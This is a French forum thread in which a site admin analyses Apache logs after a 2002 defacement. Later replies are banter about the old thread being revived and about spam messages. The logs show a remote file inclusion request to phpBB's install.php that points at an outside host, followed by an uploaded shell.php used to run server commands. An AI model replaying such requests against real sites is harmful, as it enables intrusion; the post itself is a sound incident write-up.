Nous nous sommes fait hacker

Bonjour à tous.

En ce jour sombre, c’est ce matin que j’ai découvert un hack de tous les sites qui sont hébergés ici. Herueusement rien de grave, juste les index.php ont été remplacés.

Seulement voilà, il fallait trouver la faille qui a permis au méchant vilain pas beau de nous faire du tort.

Voici donc le cours d’analyse de logs apache par Axel:

200.163.8.140 - - [20/Dec/2002:01:33:48 +0100] "GET / HTTP/1.1" 200 6572 forums.axelgamecenter.com "http://www.alltheweb.com/search?q=%22powered+by+phpbb+2.0.1%22&c=web&cs=utf-8&o=930&l=any" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "-"
  1. Notre hackeur a fait des recherches sur “Powered by phpBB 2.0.1” Il cherchait donc volontairement à hacker par le forum: phpBB doit souffrir d’une faille de sécurité importante. Je vais tâcher de la corriger le plus vite possible avec l’aide d’aevoc.
200.163.8.140 - - [20/Dec/2002:01:34:01 +0100] "GET /install.php?phpbb_root_dir=http://www.superwroger.hpg.ig.com.br/ HTTP/1.1" 200 1266 forums.axelgamecenter.com "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "-" 207.253.45.194 - - [20/Dec/2002:01:34:45 +0100] "GET / HTTP/1.1" 200 683 www.mahorosan.net "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "-"
  1. Là notre ami “installe” un nouveau phpBB dans notre forum en se servant du sien sur sa bécane comme source (corrompue).

De toutes évidence à partir de ce moment là on peut dire que la faute me revient, ce fichier install.php aurait dû être effacé. Ca n’a pas été fait. J’en assume les conséquences.

200.163.8.140 - - [20/Dec/2002:01:36:01 +0100] "GET /shell.php HTTP/1.1" 200 13127 forums.axelgamecenter.com "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "-" 200.163.8.140 - - [20/Dec/2002:01:36:06 +0100] "POST /shell.php HTTP/1.1" 200 13605 forums.axelgamecenter.com "http://forums.axelgamecenter.com/shell.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "-"
  1. Et c’est là qu’il a commencé à faire le batard en uploadant un script php qui lui a permis d’envoyer n’importe quelle commande UNIX au serveur web, à savoir déplacer, renommer, supprimer, copier des fichiers etc.

Ingénieux, non?

En tous cas c’est une belle leçon de sécurité pour moi :slight_smile:

Tin les pourris c’est abusé… A quoi ca leur sert de s’attaquer à notre forum ?

Bah surtout ce que je capte pas, c’est que tu dis qu’il est passé par le forum car il existait une faille dans phpBB . Mais il me semblais que sur tes conseils judicieux, nous etions passer sous Simple Machines, justement pour éviter ce genre de “menu problème” ???

Il a fait comment alors le gaillard ? Si on a pas de forum en phpBB ??

Encore une vieille version du forum sous php qui traine ?

ouais, ça doit une être une vieille version qui date du 20 Décembre 2002 à 14:27:35 (environ)…

Ohlolol, me suis fait niquer par les coups de pelle de Parpin…

pas bien les déterrages parpin, vilain vas :boxe_face:

Excellent, Trop fort, j’me suis laissé avoir aussi moi

nous nous sommes fait hacker par jérémy :140:

vas repasser ton suaire toi, voir si ma photo y est :004_drole_04:

ololol

faut le connaitre

kissa ???

Jérémy rador

On s’est peut être pas fait hacker, mais bon les vieux membres bidons qui sont là pour t’envoyer des messages perso pour le la pub de pr0n de merde… bof bof :106:

C’est rare, mais ça viens d’arriver sur le forum… je suppose que vous l’avez aussi.

Je m’en suis occupé ce matin, malheureusement on peut pas faire grand chose, peut-être migrer sous SMF 2 à la limite, mais encore… Vu l’utilisation du forum ça me fait un poil chier de dépenser autant d’énergie à réinstaller les mods, surtout que si y’a pas l’arcade ou le shop ou la shoutbox ou je ne sais quoi sui manque y’en a qui vont venir me dire “ouiiiin y’a plus ça sur le forum”, 'fin bref.

Nan mais t’inquiet, on sait que rien n’est parfait. Faut pas se plaindre non plus c’est archi rare… Je disais juste que c’est chiant stou :stuck_out_tongue:

c’était pas plutot “pOrn” allion? :smiley:

Non non, j’ai bien écrit… pr0n, sinon j’aurais écrit porn normalement.